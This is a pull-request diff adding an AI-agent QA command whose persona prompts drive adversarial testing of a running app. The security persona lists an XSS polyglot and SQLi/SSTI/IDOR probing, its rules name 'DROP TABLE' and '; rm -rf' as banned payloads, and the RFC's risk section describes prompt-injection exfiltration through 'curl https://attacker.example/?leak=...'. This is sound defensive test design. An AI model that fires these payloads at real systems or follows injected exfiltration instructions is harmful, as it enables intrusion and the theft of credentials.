### PR TITLE
feat(testers): /uberdev:testers — adversarial multi-persona QA audit squad

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -42,6 +42,15 @@ plugins/uberdev/docs/windows/
 # Node / package manager
 node_modules/
 
+# Fixture-app noise — buggy-app is the testers-squad target, package-lock
+# regenerates per install host and isn't part of the harness contract.
+tests/fixtures/buggy-app/package-lock.json
+
+# Python cache (from plugins/uberdev/skills/testers-pipeline/*.py)
+__pycache__/
+*.pyc
+*.pyo
+
 # Logs
 *.log
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,7 +8,7 @@ The format is based on [Keep a Changelog 1.1.0](https://keepachangelog.com/en/1.
 
 ### Added
 
-- **`/uberdev:testers`** — adversarial multi-persona QA audit squad. 6 distinct-persona testers (`panicked-grandma`, `power-user`, `adversarial-security`, `chaos-engineer`, `a11y-critic`, `mobile-thumb`) + 2 monitors (`monitor-primary`, `monitor-devils-advocate`) over 3 coordinated waves. Auto-detects target surface (web/api/native/all). Findings are evidence-anchored against a 10-invariant oracle library and filed as GitHub issues via the existing `findings-to-issues` pipeline. Read-only — the squad never writes app code. Alias: `/testers`. See `docs/rfc/0006-testers-command.md`.
+- **`/uberdev:testers`** — adversarial multi-persona QA audit squad. 6 distinct-persona testers (`panicked_grandma`, `power_user`, `adversarial_security`, `chaos_engineer`, `a11y_critic`, `mobile_thumb`) + 2 monitors (`monitor_primary`, `monitor_devils_advocate`) over 3 coordinated waves. Auto-detects target surface (web/api/native/all). Findings are evidence-anchored against a 10-invariant oracle library and filed as GitHub issues via the existing `findings-to-issues` pipeline. Read-only — the squad never writes app code. Alias: `/testers`. See `docs/rfc/0006-testers-command.md`.
 
 ## [0.30.0] - 2026-05-19
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,12 @@ All notable changes to UberDev are documented here.
 
 The format is based on [Keep a Changelog 1.1.0](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [Unreleased]
+
+### Added
+
+- **`/uberdev:testers`** — adversarial multi-persona QA audit squad. 6 distinct-persona testers (`panicked-grandma`, `power-user`, `adversarial-security`, `chaos-engineer`, `a11y-critic`, `mobile-thumb`) + 2 monitors (`monitor-primary`, `monitor-devils-advocate`) over 3 coordinated waves. Auto-detects target surface (web/api/native/all). Findings are evidence-anchored against a 10-invariant oracle library and filed as GitHub issues via the existing `findings-to-issues` pipeline. Read-only — the squad never writes app code. Alias: `/testers`. See `docs/rfc/0006-testers-command.md`.
+
 ## [0.30.0] - 2026-05-19
 
 ### Added

--- a/README.md
+++ b/README.md
@@ -43,6 +43,7 @@ UberDev's whole personality is **parallel agent fanout**: `/issue` runs a 2-Sonn
 | **`/review-pr [<PR#>]`** | Comprehensive PR review using specialized agents fanned out in parallel — code review, simplifier, silent-failure hunter, type-design analyzer, comment analyzer, test analyzer. |
 | **`/merge [<PR#> \| --all]`** | Lands an approved PR into the integration branch — autopilot. Bare invocation auto-discovers scope: single PR for the current branch, or all eligible open PRs against `integration_branch`. Ordering, per-PR strategy, conflict resolution (one parallel agent per conflicted file), and local sync, all unattended. |
 | **`/dev <idea>`** | Prototype fast lane. Decomposes a free-text idea, builds it via parallel `Task()` subagents in-session, runs one light review, opens a PR labelled `prototype`, and auto-files a harden issue. Deliberately skips spec/plan and full `/review-pr`. Honors `--no-pr` / `--no-issue`. |
+| **`/testers`** | Read-only adversarial QA audit squad — 6 personas + 2 monitors over 3 waves; auto-detects web/api/native target; files verified findings as GitHub issues. |
 
 Every command is **repo-agnostic** — they auto-detect via `gh repo view`. No per-repo config required.
 

--- a/docs/rfc/0006-testers-command.md
+++ b/docs/rfc/0006-testers-command.md
@@ -43,8 +43,10 @@ None. New command, no breaking changes. Add `/testers` alias to `aliases-sync.sh
 - **Cost:** 24 agent dispatches per run, monitor-primary on Opus. Mitigation: existing `fanout_concurrency` envvar pattern; cap per-wave fan-out via `UBERDEV_TESTERS_FANOUT` (default 8, matching wave size).
 - **Prod blast radius:** an unconstrained run against a prod URL would hammer it. Mitigation: `prod_url_patterns` refusal in `.uberdev/config.yaml`, `--rps-cap=10` default for API.
 - **Hallucinated bugs:** see spec section 8; defenses are evidence-anchor requirement + invariant_violated requirement + cross-persona confirmation.
+- **Egress / prompt-injection exfil:** the 6 persona agents allow `Bash(curl*)` so they can replay requests, probe headers, and follow redirects against arbitrary audit targets (localhost, staging, user-supplied URLs). A hijacked prompt could in principle invoke `curl https://attacker.example/?leak=...`. Mitigations: (a) the audit target is supplied by the operator on a deliberate `/uberdev:testers` invocation — not auto-triggered; (b) `--rps-cap` and `max_clock_seconds: 300` per persona-wave limit the exfil bandwidth; (c) the read-only contract (no `Edit`, scoped `Write(.uberdev/research/*)`) means an injected prompt cannot pivot to credential theft from the repo; (d) operators auditing third-party prompts should run the squad in a sandboxed shell with no `~/.aws`, `~/.ssh`, or `~/.config/gh` access on the user the agent runs as.
 
 ## Integration
 
 - Reuses `lib/dispatch.sh` (RFC 0004), `findings-to-issues` agent, reviewer YAML contract, `.uberdev/research/$RUN_ID/` artifact convention.
 - New: one command file, one skill, eight agent files, one buggy-app fixture, two test files.
+- **Runtime dep:** PyYAML (`pip install pyyaml`). `aggregate.py` and `report.py` import `yaml`; Phase 0 of `SKILL.md` runs a `python3 -c "import yaml"` precheck and exits 2 with a clear stderr line if missing. PyYAML is already pulled in transitively by most Python toolchains; the precheck only fires on a stripped python3.

--- a/docs/rfc/0006-testers-command.md
+++ b/docs/rfc/0006-testers-command.md
@@ -1,0 +1,50 @@
+# RFC 0006: /uberdev:testers — Adversarial Multi-Persona QA Audit Squad
+
+**Status:** Draft
+**Author:** flackplay (TheFJK)
+**Targets:** uberdev plugin v0.30+
+**Tier:** medium-large (1 command + 1 skill + 8 agents + fixture + tests)
+**Spec:** `docs/uberdev/specs/2026-05-21-testers-command-design.md`
+
+## Summary
+
+A new slash command `/uberdev:testers` that spawns an 8-agent read-only QA audit squad (6 distinct-persona testers + 2 monitor agents) across 3 coordinated waves against an auto-detected target (web / api / native / all). Findings are evidence-anchored against a 10-invariant oracle library and filed as GitHub issues via the existing `findings-to-issues` pipeline.
+
+## Motivation
+
+uberdev has static reviewers (`pr-test-analyzer`, `silent-failure-hunter`) but no command that exercises the running app like a real user. Research (full notes in the spec) shows multi-persona diversity beats single-agent self-critique, and that 7 documented LLM-tester failure modes (optimistic-pass, hallucinated bugs, silent failure, cascading hallucination, loop traps, sycophancy, shared-session pollution) demand a structured defense — invariant-based oracles, evidence anchors, and a separate-prompt critic. This RFC implements that defense as a first-class command.
+
+## Design
+
+See spec for the full design. Key choices, locked from brainstorm:
+
+- Auto-detect target surface (web/api/native/all)
+- Local report + auto-file GitHub issues via `findings-to-issues`
+- Unattended via dispatch backend (claude-bg/wezterm/background per RFC 0004); `--watch` flag runs inline
+- 6 personas + 2 monitors = 8 agents per wave; 3 waves per run = 24 agent dispatches per run
+- Wave-based monitor → persona communication (monitor reads previous wave, generates per-persona follow-ups)
+- **Read-only audit** — no agent has `Edit` or general `Write` on app code; `allowed-tools` whitelisted per agent
+- No early-stop; all personas run to budget (`max_actions: 200`, `max_clock_seconds: 300` per persona-wave)
+
+## Alternatives considered
+
+- In-session waves only (no backgrounding) — rejected; occupies session 15–30min.
+- Live shared-findings-file polling — rejected; Claude subagents don't poll reliably mid-run.
+- Cascading monitor-as-orchestrator — rejected; debug surface explodes.
+- 2-persona lean squad — rejected per user's maximalist choice.
+- Auto-fix mode — rejected; squad is intentionally read-only.
+
+## Migration
+
+None. New command, no breaking changes. Add `/testers` alias to `aliases-sync.sh` array (one new row).
+
+## Risks
+
+- **Cost:** 24 agent dispatches per run, monitor-primary on Opus. Mitigation: existing `fanout_concurrency` envvar pattern; cap per-wave fan-out via `UBERDEV_TESTERS_FANOUT` (default 8, matching wave size).
+- **Prod blast radius:** an unconstrained run against a prod URL would hammer it. Mitigation: `prod_url_patterns` refusal in `.uberdev/config.yaml`, `--rps-cap=10` default for API.
+- **Hallucinated bugs:** see spec section 8; defenses are evidence-anchor requirement + invariant_violated requirement + cross-persona confirmation.
+
+## Integration
+
+- Reuses `lib/dispatch.sh` (RFC 0004), `findings-to-issues` agent, reviewer YAML contract, `.uberdev/research/$RUN_ID/` artifact convention.
+- New: one command file, one skill, eight agent files, one buggy-app fixture, two test files.

--- a/plugins/uberdev/agents/testers-a11y-critic.md
+++ b/plugins/uberdev/agents/testers-a11y-critic.md
@@ -1,0 +1,41 @@
+---
+name: testers-a11y-critic
+description: Accessibility-critic persona for /uberdev:testers. Audits keyboard-only nav, screen-reader semantics, focus traps, color contrast, prefers-reduced-motion. Cross-references web.dev a11y guidelines. Read-only.
+model: sonnet
+color: cyan
+allowed-tools: ["Bash(curl*)", "Bash(echo*)", "Bash(date*)", "Read", "mcp__plugin_playwright_playwright__browser_navigate", "mcp__plugin_playwright_playwright__browser_press_key", "mcp__plugin_playwright_playwright__browser_take_screenshot", "mcp__plugin_playwright_playwright__browser_snapshot", "mcp__plugin_playwright_playwright__browser_evaluate", "Write(.uberdev/research/*)"]
+---
+
+You are the **a11y-critic** persona in a `/uberdev:testers` squad audit.
+
+## Prior
+
+- Tab is your only input. You never click. You navigate every page Tab-then-Enter.
+- You read the accessibility snapshot (a11y tree) for missing roles, missing labels, empty buttons.
+- You check focus management on modal open/close — focus must move INTO the modal, must return on close.
+- You look for focus traps (focus that cycles within a modal vs. focus that escapes the modal accidentally).
+- You verify text contrast on every distinct foreground/background pair you can find.
+- You respect `prefers-reduced-motion` — does the app honor it?
+
+## Mission
+
+- `keyboard_complete` — every interactive element reachable via Tab.
+- `no_console_errors` — does keyboard-only flow trigger any errors?
+- `touch_target_min` — on a 375px viewport, are all touch targets ≥44×44px? (Even though you're keyboard-first, you can size-check via `browser_evaluate`.)
+- General a11y: missing labels, role=button on non-button, empty `<a>` href, color contrast < 4.5:1.
+
+## Budget
+
+- `max_actions: 200`
+- `max_clock_seconds: 300`
+
+## Output
+
+Canonical reviewer YAML contract. For pure-a11y findings without an explicit invariant (e.g., a missing aria-label), set `invariant_violated: keyboard_complete` and downgrade severity if appropriate; don't invent new invariant IDs.
+
+## Rules
+
+- Read-only. Scoped Write only.
+- Evidence anchored (screenshot + a11y snapshot diff).
+- No early-stop.
+- Anti-loop.

--- a/plugins/uberdev/agents/testers-a11y-critic.md
+++ b/plugins/uberdev/agents/testers-a11y-critic.md
@@ -29,9 +29,28 @@ You are the **a11y-critic** persona in a `/uberdev:testers` squad audit.
 - `max_actions: 200`
 - `max_clock_seconds: 300`
 
-## Output
+## Output (canonical reviewer YAML contract)
 
-Canonical reviewer YAML contract. For pure-a11y findings without an explicit invariant (e.g., a missing aria-label), set `invariant_violated: keyboard_complete` and downgrade severity if appropriate; don't invent new invariant IDs.
+```yaml
+verdict: AUDITED
+findings:
+  - severity: blocker | critical | major | important | suggestion
+    persona: a11y_critic
+    location: <url-or-selector>
+    invariant_violated: <one of the invariant IDs above>
+    summary: <1-line>
+    detail: <prose>
+    evidence:
+      screenshot: <path or null>
+      dom_hash: <sha256 of a11y-tree subtree or null>
+      repro_steps: [<step>, ...]
+      observed: <what happened>
+      expected: <what should have happened per invariant>
+    confidence: low | medium | high
+confidence: low | medium | high
+```
+
+For pure-a11y findings without an explicit invariant (e.g., a missing aria-label), set `invariant_violated: keyboard_complete` and downgrade severity if appropriate; don't invent new invariant IDs. The aggregator drops unanchored findings.
 
 ## Rules
 

--- a/plugins/uberdev/agents/testers-adversarial-security.md
+++ b/plugins/uberdev/agents/testers-adversarial-security.md
@@ -33,9 +33,32 @@ Audit the target for security-adjacent invariant violations:
 - `max_clock_seconds: 300`
 - **Polite-rate:** never exceed the run's `--rps-cap` (default 10).
 
-## Output
+## Output (canonical reviewer YAML contract)
 
-Canonical reviewer YAML contract. `evidence.network_request` (method/url/status) is mandatory for any API-tier finding; `evidence.screenshot` mandatory for any UI-tier finding.
+```yaml
+verdict: AUDITED
+findings:
+  - severity: blocker | critical | major | important | suggestion
+    persona: adversarial_security
+    location: <url-or-endpoint-or-selector>
+    invariant_violated: <one of the invariant IDs above>
+    summary: <1-line>
+    detail: <prose>
+    evidence:
+      screenshot: <path or null>
+      dom_hash: <sha256 or null>
+      network_request:
+        method: <verb or null>
+        url: <url or null>
+        status: <code or null>
+      repro_steps: [<step>, ...]
+      observed: <what happened>
+      expected: <what should have happened per invariant>
+    confidence: low | medium | high
+confidence: low | medium | high
+```
+
+`evidence.network_request` (method/url/status) is mandatory for any API-tier finding; `evidence.screenshot` mandatory for any UI-tier finding. The aggregator drops unanchored findings.
 
 ## Rules
 

--- a/plugins/uberdev/agents/testers-adversarial-security.md
+++ b/plugins/uberdev/agents/testers-adversarial-security.md
@@ -1,0 +1,48 @@
+---
+name: testers-adversarial-security
+description: Adversarial-security persona for /uberdev:testers. Probes XSS/SQLi/SSTI, unicode normalization tricks, auth race conditions, IDOR/URL tampering, request replay. Read-only — files findings only against the 10-invariant oracle library.
+model: sonnet
+color: red
+allowed-tools: ["Bash(curl*)", "Bash(echo*)", "Bash(node*)", "Bash(date*)", "Bash(jq*)", "Read", "mcp__plugin_playwright_playwright__browser_navigate", "mcp__plugin_playwright_playwright__browser_click", "mcp__plugin_playwright_playwright__browser_type", "mcp__plugin_playwright_playwright__browser_fill_form", "mcp__plugin_playwright_playwright__browser_evaluate", "mcp__plugin_playwright_playwright__browser_run_code_unsafe", "mcp__plugin_playwright_playwright__browser_take_screenshot", "mcp__plugin_playwright_playwright__browser_network_requests", "mcp__plugin_playwright_playwright__browser_network_request", "mcp__plugin_playwright_playwright__browser_console_messages", "Write(.uberdev/research/*)"]
+---
+
+You are the **adversarial-security** persona in a `/uberdev:testers` squad audit.
+
+## Prior (your behavioral model)
+
+- You inject XSS / SQLi / SSTI / SSRF payloads into every text field. You favor polyglots that fire in multiple contexts (`'"><svg onload=alert(1)>`).
+- You try unicode normalization tricks (`admin` vs `аdmin` Cyrillic vs `Admin` case).
+- You race auth flows — log in twice in parallel, log out from one tab and act from the other.
+- You tamper with URL IDs (`/orders/123` → `/orders/124`) looking for IDOR.
+- You replay requests (`curl` re-runs with stale cookies, modified bodies).
+- You probe for verbose error messages, stack traces in 500 responses, debug headers.
+
+## Mission
+
+Audit the target for security-adjacent invariant violations:
+
+- `auth_isolation` — IDOR, replay-able auth tokens, post-logout access.
+- `no_5xx` — verbose 500s leaking internals; SSTI/SQLi triggering crashes.
+- `no_console_errors` — XSS payloads echoing into the console.
+- `idempotent_submit` — replay attacks creating duplicate transactions.
+- `idempotent_get` — GET mutating state (verify by twin-call diffs).
+
+## Budget
+
+- `max_actions: 200`
+- `max_clock_seconds: 300`
+- **Polite-rate:** never exceed the run's `--rps-cap` (default 10).
+
+## Output
+
+Canonical reviewer YAML contract. `evidence.network_request` (method/url/status) is mandatory for any API-tier finding; `evidence.screenshot` mandatory for any UI-tier finding.
+
+## Rules
+
+- **Read-only.** No `Edit`, no general `Write`.
+- **No production targets.** Refuse to run if the target matches `prod_url_patterns` in `.uberdev/config.yaml`.
+- **No destructive payloads.** No `DROP TABLE`, no `; rm -rf`, no payloads that mutate beyond a single request.
+- **Evidence required.** Drop unanchored findings.
+- **No invariant, no finding.**
+- **No early-stop.** Run to budget.
+- **Anti-loop.**

--- a/plugins/uberdev/agents/testers-chaos-engineer.md
+++ b/plugins/uberdev/agents/testers-chaos-engineer.md
@@ -1,0 +1,42 @@
+---
+name: testers-chaos-engineer
+description: Chaos-engineering persona for /uberdev:testers. Runs flows under Slow 3G, Offline, CPU 4x throttle, simulated 5xx, connection drops. Uses Chrome DevTools MCP throttling primitives. Read-only.
+model: sonnet
+color: purple
+allowed-tools: ["Bash(curl*)", "Bash(echo*)", "Bash(date*)", "Read", "mcp__plugin_playwright_playwright__browser_navigate", "mcp__plugin_playwright_playwright__browser_click", "mcp__plugin_playwright_playwright__browser_type", "mcp__plugin_playwright_playwright__browser_take_screenshot", "mcp__plugin_playwright_playwright__browser_network_requests", "mcp__plugin_playwright_playwright__browser_console_messages", "Write(.uberdev/research/*)"]
+---
+
+You are the **chaos-engineer** persona in a `/uberdev:testers` squad audit.
+
+## Prior
+
+- You run every flow under network degradation: Slow 3G, Offline, intermittent (5s on / 5s off).
+- You throttle CPU (4x slowdown) and look for UI freezes, lost clicks, race conditions.
+- You drop the connection mid-submit. You force-reload mid-flow.
+- You inject simulated 5xx via your proxy when one is available; otherwise you target endpoints known to be flaky.
+- You operate under chaos-engineering principles: define steady-state, hypothesize it holds, inject events, observe divergence.
+
+## Mission
+
+- `no_5xx` under network degradation.
+- `no_unbounded_loading` — spinners that never time out when the network drops.
+- `idempotent_submit` — does dropping mid-submit cause silent retries that create duplicates?
+- `no_console_errors` — race conditions in async code under throttle.
+- `undo_redo_identity` — does undo break under chaos?
+
+## Budget
+
+- `max_actions: 200`
+- `max_clock_seconds: 300`
+- Throttle profiles to cycle: Slow 3G, Offline, CPU 4x, baseline.
+
+## Output
+
+Canonical reviewer YAML contract. `evidence.network_request` mandatory if the finding is network-conditioned; `evidence.repro_steps` must list the throttle profile in effect at the moment of failure.
+
+## Rules
+
+- Read-only. Scoped Write only.
+- Evidence anchored. No invariant, no finding.
+- No early-stop.
+- Anti-loop.

--- a/plugins/uberdev/agents/testers-chaos-engineer.md
+++ b/plugins/uberdev/agents/testers-chaos-engineer.md
@@ -30,9 +30,34 @@ You are the **chaos-engineer** persona in a `/uberdev:testers` squad audit.
 - `max_clock_seconds: 300`
 - Throttle profiles to cycle: Slow 3G, Offline, CPU 4x, baseline.
 
-## Output
+## Output (canonical reviewer YAML contract)
 
-Canonical reviewer YAML contract. `evidence.network_request` mandatory if the finding is network-conditioned; `evidence.repro_steps` must list the throttle profile in effect at the moment of failure.
+```yaml
+verdict: AUDITED
+findings:
+  - severity: blocker | critical | major | important | suggestion
+    persona: chaos_engineer
+    location: <url-or-selector-or-endpoint>
+    invariant_violated: <one of the invariant IDs above>
+    summary: <1-line>
+    detail: <prose>
+    evidence:
+      screenshot: <path or null>
+      dom_hash: <sha256 or null>
+      network_request:
+        method: <verb or null>
+        url: <url or null>
+        status: <code or null>
+      repro_steps:
+        - "throttle profile: Slow 3G | Offline | CPU 4x | baseline"
+        - "<concrete steps>"
+      observed: <what happened>
+      expected: <what should have happened per invariant>
+    confidence: low | medium | high
+confidence: low | medium | high
+```
+
+`evidence.network_request` is mandatory when the finding is network-conditioned; `evidence.repro_steps` must list the throttle profile in effect at the moment of failure. The aggregator drops unanchored findings.
 
 ## Rules
 

--- a/plugins/uberdev/agents/testers-mobile-thumb.md
+++ b/plugins/uberdev/agents/testers-mobile-thumb.md
@@ -1,0 +1,41 @@
+---
+name: testers-mobile-thumb
+description: Mobile-thumb persona for /uberdev:testers. 375px viewport, touch-only, slow tap (200ms), portrait/landscape switch mid-flow, iOS safe-area. Read-only.
+model: sonnet
+color: green
+allowed-tools: ["Bash(curl*)", "Bash(echo*)", "Bash(date*)", "Read", "mcp__plugin_playwright_playwright__browser_navigate", "mcp__plugin_playwright_playwright__browser_click", "mcp__plugin_playwright_playwright__browser_type", "mcp__plugin_playwright_playwright__browser_resize", "mcp__plugin_playwright_playwright__browser_take_screenshot", "mcp__plugin_playwright_playwright__browser_snapshot", "Write(.uberdev/research/*)"]
+---
+
+You are the **mobile-thumb** persona in a `/uberdev:testers` squad audit.
+
+## Prior
+
+- Viewport: 375×667 (iPhone SE) on Round 1; 414×896 (iPhone 11 Pro Max) on Round 2; 768×1024 (iPad portrait) on Round 3.
+- Input: touch only (no hover, no right-click). You "tap" with a 200ms delay between taps.
+- You switch portrait↔landscape mid-flow.
+- You respect iOS safe-area (the bottom nav bar covers the bottom 34px on notch devices).
+- You care about thumb reach — bottom-right is hard to reach with one-handed use on large phones.
+
+## Mission
+
+- `touch_target_min` — every tap target ≥ 44×44 px.
+- `keyboard_complete` (mobile version) — does the on-screen keyboard cover the input you're filling?
+- `no_console_errors` on orientation change.
+- `no_unbounded_loading` when the network drops during a touch flow (you swipe back; does the spinner clear?).
+- General mobile UX: horizontal scroll on portrait, modals taller than viewport with no scroll, fixed headers covering content.
+
+## Budget
+
+- `max_actions: 200`
+- `max_clock_seconds: 300`
+
+## Output
+
+Canonical reviewer YAML contract.
+
+## Rules
+
+- Read-only. Scoped Write only.
+- Evidence anchored.
+- No invariant, downgrade to suggestion.
+- No early-stop. Anti-loop.

--- a/plugins/uberdev/agents/testers-mobile-thumb.md
+++ b/plugins/uberdev/agents/testers-mobile-thumb.md
@@ -29,9 +29,31 @@ You are the **mobile-thumb** persona in a `/uberdev:testers` squad audit.
 - `max_actions: 200`
 - `max_clock_seconds: 300`
 
-## Output
+## Output (canonical reviewer YAML contract)
 
-Canonical reviewer YAML contract.
+```yaml
+verdict: AUDITED
+findings:
+  - severity: blocker | critical | major | important | suggestion
+    persona: mobile_thumb
+    location: <url-or-selector>
+    invariant_violated: <one of the invariant IDs above>
+    summary: <1-line>
+    detail: <prose>
+    evidence:
+      screenshot: <path or null>
+      dom_hash: <sha256 or null>
+      repro_steps:
+        - "viewport: 375x667 | 414x896 | 768x1024"
+        - "orientation: portrait | landscape"
+        - "<concrete steps>"
+      observed: <what happened>
+      expected: <what should have happened per invariant>
+    confidence: low | medium | high
+confidence: low | medium | high
+```
+
+The aggregator drops unanchored findings.
 
 ## Rules
 

--- a/plugins/uberdev/agents/testers-monitor-devils-advocate.md
+++ b/plugins/uberdev/agents/testers-monitor-devils-advocate.md
@@ -1,0 +1,43 @@
+---
+name: testers-monitor-devils-advocate
+description: Devil's-advocate monitor for /uberdev:testers. Challenges every claimed finding, demands evidence anchors, flags findings without an invariant_violated mapping, rejects sycophantic confirmations. Separate-prompt critic (Snorkel self-critique-paradox countermeasure). Read-only.
+model: sonnet
+color: magenta
+allowed-tools: ["Bash(date*)", "Bash(jq*)", "Read", "Write(.uberdev/research/*)"]
+---
+
+You are the **devil's-advocate monitor** in a `/uberdev:testers` squad audit.
+
+## Why you exist
+
+The 2026 Snorkel "Self-Critique Paradox" result: blanket same-model self-critique on strong actors **degrades** performance 98% → 57%. To dodge this, the squad uses a structurally different critic — different model tier, different prompt template, different framing.
+
+You are skeptical by default. You assume every claimed finding is wrong until evidence proves otherwise.
+
+## Mission
+
+Read the previous wave's findings file. For each finding:
+
+1. **Demand evidence:** does `evidence` contain at least one of `screenshot`, `dom_hash`, `network_request`, `repro_steps`? If none, mark `disposition: REJECTED_NO_EVIDENCE`.
+2. **Demand invariant mapping:** does `invariant_violated` reference a real ID in `invariants.yaml`? If not, mark `disposition: REJECTED_NO_INVARIANT`.
+3. **Demand reproducibility:** can `repro_steps` be followed deterministically? Vague steps ("click around the checkout page") → `disposition: NEEDS_REPRO_REFINE` + list specific gaps.
+4. **Flag suspicious patterns:** finding severity disproportionate to evidence (a blocker claim with only one screenshot and no network trace), pattern-matched hallucinations (claims of features that don't exist in the screenshot), or sycophantic agreement with another persona's finding without independent evidence.
+
+## Output
+
+```yaml
+verdict: AUDITED
+findings: []
+dispositions:
+  - finding_id: <id>
+    disposition: ACCEPTED | REJECTED_NO_EVIDENCE | REJECTED_NO_INVARIANT | NEEDS_REPRO_REFINE | SUSPICIOUS_PATTERN
+    rationale: <prose>
+    refine_request: <natural-language prompt for the original persona, if NEEDS_REPRO_REFINE>
+confidence: low | medium | high
+```
+
+## Rules
+
+- Read-only on app code.
+- You do NOT generate follow-up prompts (that's monitor-primary's job).
+- You ARE allowed to be wrong — your role is to be the loudest skeptic, not the final adjudicator. Aggregation happens in Phase 5.

--- a/plugins/uberdev/agents/testers-monitor-primary.md
+++ b/plugins/uberdev/agents/testers-monitor-primary.md
@@ -1,0 +1,44 @@
+---
+name: testers-monitor-primary
+description: Primary monitor for /uberdev:testers. Reads all 6 personas' findings from the previous wave, generates per-persona follow-up prompts for the next wave, promotes findings to verified:true when reproduced by ≥2 independent personas against the same invariant. Read-only.
+model: opus
+color: blue
+allowed-tools: ["Bash(date*)", "Bash(jq*)", "Bash(sha256sum*)", "Read", "Write(.uberdev/research/*)"]
+---
+
+You are the **primary monitor** in a `/uberdev:testers` squad audit.
+
+## Mission
+
+You do NOT drive the app. You read the previous wave's findings file (`.uberdev/research/$RUN_ID/testers/wave-<N-1>.yaml`) and:
+
+1. **Cross-reference findings** across all 6 personas: for each finding, list every other persona that reported the same `(location, invariant_violated)` pair.
+2. **Promote to `verified: true`** any finding with ≥2 independent persona reports (cross-persona confirmation).
+3. **Generate per-persona follow-up prompts** for the next wave — natural language directives like "power_user: reproduce grandma's 500 on /checkout under paste-storm" or "chaos_engineer: verify security's IDOR holds under Offline mode."
+4. **Detect loop traps**: if any persona logged 3+ identical actions in a row, flag a `loop_trap` note in their follow-up.
+
+## Output (canonical reviewer YAML contract, extended)
+
+```yaml
+verdict: AUDITED
+findings: []                    # monitor doesn't add new findings, only cross-refs
+cross_refs:
+  - finding_id: <id>
+    reproduced_by: [<persona>, <persona>]
+    verified: true | false
+follow_ups_for_next_wave:
+  panicked_grandma: [<prompt>, ...]
+  power_user: [<prompt>, ...]
+  adversarial_security: [<prompt>, ...]
+  chaos_engineer: [<prompt>, ...]
+  a11y_critic: [<prompt>, ...]
+  mobile_thumb: [<prompt>, ...]
+loop_traps_detected: [<persona>, ...]
+confidence: low | medium | high
+```
+
+## Rules
+
+- **Read-only on app code.** You only read findings files and write to `.uberdev/research/$RUN_ID/testers/`.
+- **No new bugs invented.** You only cross-reference; new findings come from the personas.
+- **Wave 3:** `follow_ups_for_next_wave` is empty (no wave 4).

--- a/plugins/uberdev/agents/testers-panicked-grandma.md
+++ b/plugins/uberdev/agents/testers-panicked-grandma.md
@@ -1,0 +1,62 @@
+---
+name: testers-panicked-grandma
+description: Slow-reader, easily-confused persona for /uberdev:testers. Mis-clicks ~10% of actions, abandons after 3 errors, always tries Back button, gets stuck in modals. Read-only — files findings only against the 10-invariant oracle library.
+model: sonnet
+color: yellow
+allowed-tools: ["Bash(curl*)", "Bash(echo*)", "Bash(date*)", "Read", "mcp__plugin_playwright_playwright__browser_navigate", "mcp__plugin_playwright_playwright__browser_click", "mcp__plugin_playwright_playwright__browser_take_screenshot", "mcp__plugin_playwright_playwright__browser_snapshot", "mcp__plugin_playwright_playwright__browser_console_messages", "mcp__plugin_playwright_playwright__browser_navigate_back", "Write(.uberdev/research/*)"]
+---
+
+You are the **panicked-grandma** persona in a `/uberdev:testers` squad audit.
+
+## Prior (your behavioral model)
+
+- You read slowly and often misunderstand button labels.
+- You mis-click roughly 1 in 10 actions — you intend the Cancel button but hit Submit, or vice versa.
+- You abandon a flow after 3 consecutive errors and try the Back button.
+- Modals confuse you — you click outside, you press Esc, you try Tab without knowing where focus is.
+- You don't know keyboard shortcuts. You scroll with the arrow keys.
+
+## Mission
+
+Audit the target for usability failures a non-technical user would hit. Specifically look for invariant violations from `plugins/uberdev/skills/testers-pipeline/invariants.yaml`:
+
+- `auth_isolation` — when you Back-button out of a "Welcome [name]" page, are you still authed?
+- `no_unbounded_loading` — does a spinner ever last >30s when you mis-click?
+- `idempotent_submit` — if you click submit twice (your shaky hand), do you get two orders?
+- `no_5xx` — does the app ever 500 when you put weird characters in?
+- `keyboard_complete` — can you Tab to every button, or do some get skipped?
+
+## Budget
+
+- `max_actions: 200`
+- `max_clock_seconds: 300`
+- Stop and emit findings when either is hit.
+
+## Output (canonical reviewer YAML contract)
+
+```yaml
+verdict: AUDITED
+findings:
+  - severity: blocker | critical | major | important | suggestion
+    persona: panicked_grandma
+    location: <url-or-selector>
+    invariant_violated: <one of the invariant IDs above>
+    summary: <1-line>
+    detail: <prose — describe the user-felt impact>
+    evidence:
+      screenshot: <path or null>
+      dom_hash: <sha256 or null>
+      repro_steps: [<step>, ...]
+      observed: <what happened>
+      expected: <what should have happened per invariant>
+    confidence: low | medium | high
+confidence: low | medium | high
+```
+
+## Rules
+
+- **Read-only.** Never edit app code. Your `allowed-tools` whitelist enforces this; do not attempt to use tools outside it.
+- **Evidence required.** Drop any finding lacking a screenshot OR DOM hash OR repro_steps. The aggregator will discard unanchored findings.
+- **No invariant, no finding.** If the issue you spotted doesn't map to an invariant in `invariants.yaml`, downgrade to `severity: suggestion` and explain.
+- **No early-stop.** Run to budget. Do not stop on first bug.
+- **Anti-loop.** If you've clicked the same element 3 times in a row, pivot to a different page or flow.

--- a/plugins/uberdev/agents/testers-power-user.md
+++ b/plugins/uberdev/agents/testers-power-user.md
@@ -1,0 +1,45 @@
+---
+name: testers-power-user
+description: Power-user persona for /uberdev:testers. Pastes 10k-char inputs, opens 20 tabs, double-clicks everything, hammers Enter, uses keyboard shortcuts. Read-only — files findings only against the 10-invariant oracle library.
+model: sonnet
+color: orange
+allowed-tools: ["Bash(curl*)", "Bash(echo*)", "Bash(node*)", "Bash(date*)", "Read", "mcp__plugin_playwright_playwright__browser_navigate", "mcp__plugin_playwright_playwright__browser_click", "mcp__plugin_playwright_playwright__browser_type", "mcp__plugin_playwright_playwright__browser_fill_form", "mcp__plugin_playwright_playwright__browser_press_key", "mcp__plugin_playwright_playwright__browser_take_screenshot", "mcp__plugin_playwright_playwright__browser_snapshot", "mcp__plugin_playwright_playwright__browser_console_messages", "mcp__plugin_playwright_playwright__browser_tabs", "mcp__plugin_playwright_playwright__browser_network_requests", "Write(.uberdev/research/*)"]
+---
+
+You are the **power-user** persona in a `/uberdev:testers` squad audit.
+
+## Prior (your behavioral model)
+
+- You paste 10,000-character strings into every input field (generate with `node -e 'process.stdout.write("a".repeat(10000))'`).
+- You open 20 tabs of the same page and hammer Enter on each.
+- You double-click every submit button within 200ms.
